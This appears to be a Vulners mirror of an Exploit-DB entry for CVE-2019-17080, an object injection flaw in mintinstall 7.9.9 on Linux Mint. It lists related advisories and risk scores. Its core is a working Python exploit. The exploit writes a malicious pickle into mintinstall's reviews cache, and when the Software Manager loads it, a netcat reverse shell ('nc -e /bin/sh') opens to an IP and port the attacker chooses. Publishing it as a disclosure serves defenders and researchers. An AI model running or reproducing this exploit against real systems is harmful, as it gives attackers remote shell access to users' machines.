Lucene search
K

mintinstall 7.9.9 - Code Execution

🗓️ 03 Oct 2019 00:00:00Reported by İbrahim Hakan ŞekerType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 395 Views

mintinstall 7.9.9 - Code Execution, Object Injectio

Related
Code
ReporterTitlePublishedViews
Family
0day.today
mintinstall 7.9.9 - Code Execution Exploit
4 Oct 201900:00
zdt
Circl
CVE-2019-17080
21 Sep 202104:41
circl
CVE
CVE-2019-17080
2 Oct 201912:17
cve
Cvelist
CVE-2019-17080
2 Oct 201912:17
cvelist
exploitpack
mintinstall 7.9.9 - Code Execution
3 Oct 201900:00
exploitpack
NVD
CVE-2019-17080
2 Oct 201913:15
nvd
OSV
CVE-2019-17080
2 Oct 201913:15
osv
Packet Storm
mintinstall 7.9.9 Code Execution
2 Oct 201900:00
packetstorm
Prion
Code injection
2 Oct 201913:15
prion
RedhatCVE
CVE-2019-17080
22 May 202508:18
redhatcve
Rows per page
# Exploit Title: mintinstall (aka Software Manager) object injection
# Date: 10/02/2019
# Exploit Author: Andhrimnirr
# Vendor Homepage: https://www.linuxmint.com/
# Software Link: mintinstall (aka Software Manager)
# Version: 7.9.9
# Tested on: Linux Mint
# CVE : CVE-2019-17080


import os
import sys
def shellCode(payload):
    with open(f"{os.getenv('HOME')}/.cache/mintinstall/reviews.cache","w") as wb:
        wb.write(payload)
    print("[+] Start mintinstall")
if __name__=="__main__":
    shellCode(f"""cos\nsystem\n(S"nc -e /bin/sh {sys.argv[1]} {sys.argv[2]}"\ntR.""")
else:
    print("[!] exploit.py [IP] [PORT]")

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 Oct 2019 00:00Current
7.9High risk
Vulners AI Score7.9
CVSS 26.8
CVSS 3.17.8
EPSS0.10834
395